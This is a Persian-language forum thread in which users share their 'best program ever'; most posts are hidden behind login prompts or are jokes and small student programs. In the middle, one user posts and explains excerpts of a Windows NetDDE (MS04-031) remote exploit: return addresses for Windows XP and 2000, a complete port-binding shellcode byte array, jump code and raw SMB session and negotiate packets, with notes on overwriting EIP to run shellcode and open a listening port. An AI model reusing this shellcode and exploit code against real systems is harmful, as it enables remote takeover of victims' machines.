از اونجايي كه اساتيدي در اين فروم فعاليت دارند گفتم فرصت رو مغتنم بشمارم و يه تاپيك با عنوان بهترين برنامه اي كه تا به حال نوشتيد (به هر زباني) راه بندازيم!
تا بقيه از اين برنامه ها بهره ببرن .
فقط جون .!..!. كپي نكنين:19:

فقط مشاهده ...!
نااميد شدم رفت.:41:
پس اين فروم هم مثل بقيه فروم ها پر از افرادي هست كه فقط چهارتا اصطلاح حفظ كردن و ...

این بهترینش بوده :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

:5:

مال من اين بوده.......




برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

با تشكر .
اين يه برنامه ساده ولي جالب به زبان ++c هستش.
فقط توصيه ميكنم وقتي اجراش كنيد كه كارتون با كامپيوتر تمومه و ميخوايد خاموشش كنيد:46:!

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

مال من اين بوده.......




برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


dsa جان ميشه مقداري در مورد اين كدتون توضيح بديد:13:
يا اناليزش كنيد؟

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif


اين قسمت همانطور كه مي بينيد مربوط به شرط در ‍C++ مي باشد اين برنامه جوري نوشته شده است ميشه هم در Windows و سيستم هاي لينوكسي Compile كرد به اين صورت كه ابتدا شرط بررسي مي كند اگر در ويندوز بود Header هاي مخصوص ويندوز را Call كند و اگر لينوكس بود به همين صورت ...



{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 },
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 }
};


اين قسمت مربوطه به Ret Address ها يا EIP هاي ويندوز هاي XP و 2000 است كه قابليت رو به ما مي ده كه همزمان دو نوع Windows را Exploit كنيم .. EIP يكي Register هاي اسمبلي است كه به دستور بعدي كه قرار اجرابشه اشاره مي كنه و با بازنويسي آن و point كرد به آدرس shellcode مي توان shellcode را روي stack اجرا نمود.



/* portbind shellcode */
unsigned char portbindsc[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x 0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x 8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x 8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x 49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\x c1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x 03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x 89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x 89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\x ec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\x ad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x 3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\x ff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x 04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x 66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x 55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\x c1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x 83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x 50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x 11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x 56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x 20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x 5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x 5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\x ff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x 77\x38\xff\x55"
"\x28\xff\x55\x0c";


شل كدي است كه با هدف Port Binding نوشته شده است يعني يك پورت را باز مي كند و listen مي كنه روي اون پورت بعد هم ميشه به اون پورت Telnet كرد...



char jmpcode[] =
"\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\x 90\x90\x90\x90"
"\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\x 44\x45\x20\x28"
"\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\x 6f\x70\x79\x72"
"\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\x 34\x2d\x32\x30"
"\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x 62\x75\x73\x2e"
"\xBB\xBB\xBB\xBB" /* => eax */
"PADPAD";

char smb_sesreq[] =
"\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\x 43\x46\x44\x45"
"\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x 41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\x 45\x45\x49\x45"
"\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x 41\x43\x41\x43"
"\x41\x43\x41\x43\x41\x41\x41\x00";

char smb_negotiate[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x5c\x02"
"\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x 4d\x20\x30\x2e"
"\x31\x32\x00";


مربوط به مرحله Connect كردن به سيستم قرباني از طريق پروتكل هاي به اشتراك گذاري ميباشد...
قسمت هاي مهم توضيح دادم در پست هاي بعد بيشتر روي اين موضوع كار مي كنم ..
موفق باشيد.

با سلام
اینم یه شاهکار تو برنامه نویسی روز دنیا:

Private Sub Form_Load

End Sub


با تشکر
:10:

این آخرین برنامه ام بوده ولی بهترین برنامه ام اولین برنامه ام بود. تاریخ تولد میگرفت سن رو نشون میداد خیلی حال کردم وقتی جواب داد

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

این برنامه یه پارکینگه یک طرفه است با یک ورودی و دو قسمت پارکینگ به شکل صلیب. با استفاده از لیست پیوندی و به زبان پاسکال